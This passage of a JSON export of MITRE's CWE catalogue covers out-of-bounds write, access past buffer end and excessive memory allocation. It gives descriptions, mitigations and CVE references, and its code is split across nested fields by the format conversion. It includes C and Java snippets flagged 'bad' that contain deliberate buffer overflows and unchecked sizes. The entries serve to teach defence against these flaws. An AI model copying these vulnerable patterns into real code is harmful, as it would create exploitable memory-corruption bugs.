a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code attempts to save four different identification numbers into an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int id_sequence[3];/* Populate the id array. */id_sequence[0] = 123;id_sequence[1] = 234;id_sequence[2] = 345;id_sequence[3] = 456;","xhtml:br":["","","","","","",""]}},"Body_Text":"Since the array is only allocated to hold three elements, the valid indices are 0 to 2; so, the assignment to id_sequence[3] is out of bounds."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-0022","Description":"chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022"},{"Reference":"CVE-2019-1010006","Description":"Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006"},{"Reference":"CVE-2009-1532","Description":"malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Stack Overruns&#34; Page 129"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Heap Overruns&#34; Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}]}},"788":{"attr":{"@_ID":"788","@_Name":"Access of Memory Location After End of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer; when pointer arithmetic results in a position before the buffer; or when a negative index is used, which generates a position before the buffer.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2550","Description":"Classic stack-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550"},{"Reference":"CVE-2009-2403","Description":"Heap-based buffer overflow in media player using a long entry in a playlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403"},{"Reference":"CVE-2009-0689","Description":"large precision value in a format string triggers overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689"},{"Reference":"CVE-2009-0558","Description":"attacker-controlled array index leads to code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-788"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-788"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"789":{"attr":{"@_ID":"789","@_Name":"Memory Allocation with Excessive Size Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();unsigned int totBytes = size * sizeof(char);char *string = (char *)malloc(totBytes);InitializeString(string);","xhtml:br":["","","","",""],"xhtml:i":"/* ignore integer overflow (CWE-190) for this example */"}},"Body_Text":["Suppose an attacker provides a size value of:",{"xhtml:div":{"xhtml:div":12345678}},"This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string."]},{"Intro_Text":"Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"unsigned int size = GetUntrustedInt();HashMap list = new HashMap(size);","xhtml:br":""}},"Body_Text":"The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len];    // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."},{"Intro_Text":"The following code obtains an 